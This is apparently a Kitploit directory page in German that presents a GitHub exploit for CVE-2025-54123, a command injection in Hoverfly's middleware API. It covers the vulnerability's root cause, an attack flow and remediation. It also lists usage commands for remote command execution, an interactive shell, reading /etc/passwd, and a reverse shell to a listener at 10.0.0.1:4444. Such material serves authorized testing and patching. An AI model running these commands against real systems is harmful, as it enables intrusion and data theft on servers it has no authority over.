Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Hoverfly-1.11.3-RCE-CVE-2025-54123-Exploit — Exploit für CVE-2025-54123, eine authentifizierte OS-Command-Injection in Hoverflys Middleware-API, mit Funktionen für reine Prüfung, Einzelbefehle, interaktive Shell und Reverse-Shell für autorisierte Sicherheitstests. | Kitploit
Tools/GitHubGitHub/0x00phantom-hat/hoverfly-1.11.3-rce-cve-2025-54123-exploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlPapers & ForschungLernen & BildungRed TeamingPayload-Entwicklung
GitHub0x00phantom-hat/hoverfly-1.11.3-rce-cve-2025-54123-exploit

Hoverfly-1.11.3-RCE-CVE-2025-54123-Exploit

Exploit für CVE-2025-54123, eine authentifizierte OS-Command-Injection in Hoverflys Middleware-API, mit Funktionen für reine Prüfung, Einzelbefehle, interaktive Shell und Reverse-Shell für autorisierte Sicherheitstests.

Repository anzeigen
111vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-54123 — Remote-Code-Ausführung über Hoverfly Middleware API

Authentifizierte RCE durch OS-Befehlseinschleusung in Hoverfly ≤ 1.11.3

Schwachstellenübersicht

EigenschaftWert
CVE IDCVE-2025-54123
CVSS Score9.8 — Critical
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-78 (OS-Befehlseinschleusung), CWE-20 (Unzureichende Eingabevalidierung)
ProduktHoverfly — Open-Source-API-Simulationstool
BetroffenAlle Versionen bis einschließlich 1.11.3
Behoben in1.12.0 (Patch-Commit)
SicherheitshinweisGHSA-r4h8-hfp2-ggmf

Technische Analyse

Hier finden Sie eine ausführliche Fallstudie und technische Analyse aus White-Box- und Black-Box-Perspektive: https://medium.com/@phantom_hat/cve-2025-54123-hoverfly-1-11-3-command-injection-rce-case-study-patch-diffing-aacc092f7f3a

Angriffsfläche

Hoverfly stellt eine RESTful-Admin-API (Standardport 8888) zur Verwaltung von Simulationskonfigurationen bereit. Der Middleware-Verwaltungsendpunkt unter /api/v2/hoverfly/middleware akzeptiert einen JSON-Body mit den Feldern binary und script, die einen externen Middleware-Prozess definieren.

Grundursache

Die Schwachstelle entsteht aus einer Kombination von drei Code-Level-Fehlern:

  1. Unzureichende Eingabevalidierung — middleware.go:93-96: Die Funktion SetBinary() akzeptiert den Parameter binary ohne Validierung oder Bereinigung, was einem Angreifer ermöglicht, beliebige ausführbare Dateien (z. B. bash) anzugeben.

  2. Unsicherer Befehlsausführung — local_middleware.go:14-19: Die Middleware wird über exec.Command() ausgeführt, wobei die vom Angreifer kontrollierten Werte binary und script direkt als Argumente übergeben werden, was eine OS-Befehlseinschleusung ermöglicht.

  3. Sofortige Ausführung während des Tests — hoverfly_service.go:173: Wenn die Middleware über die API gesetzt wird, testet Hoverfly diese sofort, indem es sie ausführt, wodurch der injizierte Befehl bereits zur Konfigurationszeit und nicht erst beim Proxy-Abfangen ausgelöst wird.

Angriffsablauf

Attacker                              Hoverfly (≤ 1.11.3)
   │                                        │
   │─── POST /api/token-auth ──────────────>│  (1) Authenticate
   │<── { "token": "eyJ..." } ─────────────│
   │                                        │
   │─── PUT /api/v2/hoverfly/middleware ───>│  (2) Inject payload
   │    { "binary": "bash",                 │
   │      "script": "<malicious cmd>" }     │
   │                                        │
   │    ┌──────────────────────────────────┐│
   │    │ exec.Command("bash", tmpScript)  ││  (3) Immediate execution
   │    │ → attacker command runs as       ││
   │    │   the Hoverfly process user      ││
   │    └──────────────────────────────────┘│
   │                                        │
   │<── Command output in error response ──│  (4) Exfiltrate output
   │                                        │

Exploit-Nutzung

Voraussetzungen

  • Python 3.8+
  • Gültige Anmeldedaten für die Hoverfly-Admin-API (Standard: admin / konfigurierbares Passwort)

Installation

git clone https://github.com/<your-username>/CVE-2025-54123.git
cd CVE-2025-54123
pip install -r requirements.txt

Betriebsmodi

Nur-Prüfmodus

Überprüfen Sie Erreichbarkeit und Authentifizierung des Ziels ohne Ausnutzung:

python3 exploit.py -u http://target:8888 -U admin -P <password> -C

Einzelnen Befehl ausführen

Führen Sie einen einzelnen OS-Befehl auf dem Ziel aus:

python3 exploit.py -u http://target:8888 -U admin -P <password> -c 'id'

Interaktive Pseudo-Shell

Wechseln Sie in eine persistente Shell-Sitzung:

python3 exploit.py -u http://target:8888 -U admin -P <password> -i

Reverse Shell

Senden Sie eine Reverse-Shell an Ihren Listener:

# Terminal 1 — start listener
nc -lvnp 4444

# Terminal 2 — launch exploit
python3 exploit.py -u http://target:8888 -U admin -P <password> --revshell 10.0.0.1:4444

Ausführlicher Modus mit Proxy

Leiten Sie den Datenverkehr zur Inspektion durch Burp Suite:

python3 exploit.py -u http://target:8888 -U admin -P <password> -c 'cat /etc/passwd' --proxy -v

Vollständige Flag-Referenz

FlagBeschreibungStandard
-u, --urlZiel-Hoverfly-URLErforderlich
-U, --usernameAdmin-BenutzernameErforderlich
-P, --passwordAdmin-PasswortErforderlich
-c, --commandAuszuführender OS-Befehl—
-C, --checkNur-Prüfmodus (keine Ausnutzung)false
-i, --interactiveInteraktive Pseudo-Shellfalse
--revshellReverse Shell LHOST:LPORT—
--proxyRoute durch 127.0.0.1:8080false
--timeoutZeitüberschreitung der Anfrage (Sekunden)15
-v, --verboseAusführliche Ausgabe aktivierenfalse

Behebung

MaßnahmeEinzelheiten
AktualisierungAktualisieren Sie Hoverfly auf v1.12.0 oder höher, bei dem die Set-Middleware-API standardmäßig deaktiviert ist
NetzwerksegmentierungBeschränken Sie den Zugriff auf die Hoverfly-Admin-API (Port 8888) auf vertrauenswürdige Netzwerke
AuthentifizierungVerwenden Sie starke, eindeutige Passwörter für die Hoverfly-Admin-API
ÜberwachungÜberwachen Sie auf unerwartete PUT-Anfragen an /api/v2/hoverfly/middleware

Patch-Details

Der Fix in Commit 17e60a9 deaktiviert die Set-Middleware-API standardmäßig. Nachfolgende Änderungen an der Dokumentation (Commit a9d4da7) machen Benutzer auf die Sicherheitsauswirkungen der Offenlegung dieses Endpunkts aufmerksam.


Referenzen

  • NVD — CVE-2025-54123
  • GitHub Security Advisory — GHSA-r4h8-hfp2-ggmf
  • Vulnerable Code — hoverfly_service.go#L173
  • Vulnerable Code — middleware.go#L93
  • Vulnerable Code — local_middleware.go#L13
  • Patch Commit — 17e60a9

Haftungsausschluss

Tool herunterladen